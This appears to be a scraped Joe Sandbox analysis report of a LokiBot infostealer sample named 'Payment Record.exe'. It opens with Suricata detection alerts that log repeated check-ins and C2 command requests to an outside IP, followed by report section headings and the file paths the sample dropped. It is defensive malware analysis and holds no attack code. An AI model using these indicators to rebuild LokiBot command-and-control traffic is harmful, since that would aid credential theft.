2025-03-06T04:04:27.347257+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49810	104.21.16.1	80	TCP
2025-03-06T04:04:28.066550+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	49810	104.21.16.1	80	TCP
2025-03-06T04:04:29.224142+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	59051	104.21.16.1	80	TCP
2025-03-06T04:04:29.224142+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	59051	104.21.16.1	80	TCP
2025-03-06T04:04:29.224142+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	59051	104.21.16.1	80	TCP
2025-03-06T04:04:29.989301+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	59051	104.21.16.1	80	TCP
2025-03-06T04:04:29.994388+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.16.1	80	192.168.2.6	59051	TCP
2025-03-06T04:04:31.359423+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	59055	104.21.16.1	80	TCP
2025-03-06T04:04:31.359423+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	59055	104.21.16.1	80	TCP
2025-03-06T04:04:31.359423+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	59055	104.21.16.1	80	TCP
2025-03-06T04:04:32.111462+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	59055	104.21.16.1	80	TCP
2025-03-06T04:04:32.116545+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.16.1	80	192.168.2.6	59055	TCP
2025-03-06T04:04:33.266425+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	59060	104.21.16.1	80	TCP
2025-03-06T04:04:33.266425+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	59060	104.21.16.1	80	TCP
2025-03-06T04:04:33.266425+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	59060	104.21.16.1	80	TCP
2025-03-06T04:04:34.035641+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	59060	104.21.16.1	80	TCP
2025-03-06T04:04:34.040572+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.16.1	80	192.168.2.6	59060	TCP
2025-03-06T04:04:35.188451+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	59066	104.21.16.1	80	TCP
2025-03-06T04:04:35.188451+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	59066	104.21.16.1	80	TCP
2025-03-06T04:04:35.188451+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	59066	104.21.16.1	80	TCP
2025-03-06T04:04:35.968671+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	59066	104.21.16.1	80	TCP
2025-03-06T04:04:35.973703+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.16.1	80	192.168.2.6	59066	TCP
2025-03-06T04:04:37.317190+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	59071	104.21.16.1	80	TCP
2025-03-06T04:04:37.317190+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	59071	104.21.16.1	80	TCP
2025-03-06T04:04:37.317190+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	59071	104.21.16.1	80	TCP
2025-03-06T04:04:38.076811+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	59071	104.21.16.1	80	TCP
2025-03-06T04:04:38.081835+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.16.1	80	192.168.2.6	59071	TCP
2025-03-06T04:04:39.236859+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	59077	104.21.16.1	80	TCP
2025-03-06T04:04:39.236859+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	59077	104.21.16.1	80	TCP
2025-03-06T04:04:39.236859+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	59077	104.21.16.1	80	TCP
2025-03-06T04:04:40.007493+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	59077	104.21.16.1	80	TCP
2025-03-06T04:04:40.014611+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.16.1	80	192.168.2.6	59077	TCP
2025-03-06T04:04:41.158663+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	59081	104.21.16.1	80	TCP
2025-03-06T04:04:41.158663+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	59081	104.21.16.1	80	TCP
2025-03-06T04:04:41.158663+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	59081	104.21.16.1	80	TCP
2025-03-06T04:04:41.958238+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	59081	104.21.16.1	80	TCP
2025-03-06T04:04:41.963221+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.16.1	80	192.168.2.6	59081	TCP
2025-03-06T04:04:43.126252+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Payment Record.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Lokibot

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\autC98E.tmp

C:\Users\user\AppData\Local\Temp\hurtling

C:\Users\user\AppData\Roaming\188E93\31437F.lck

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\21c8026919fd094ab07ec3c180a9f210_9e146be9-c76a-4720-bcdb-53011b87bd06

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Windows Analysis Report
Payment Record.exe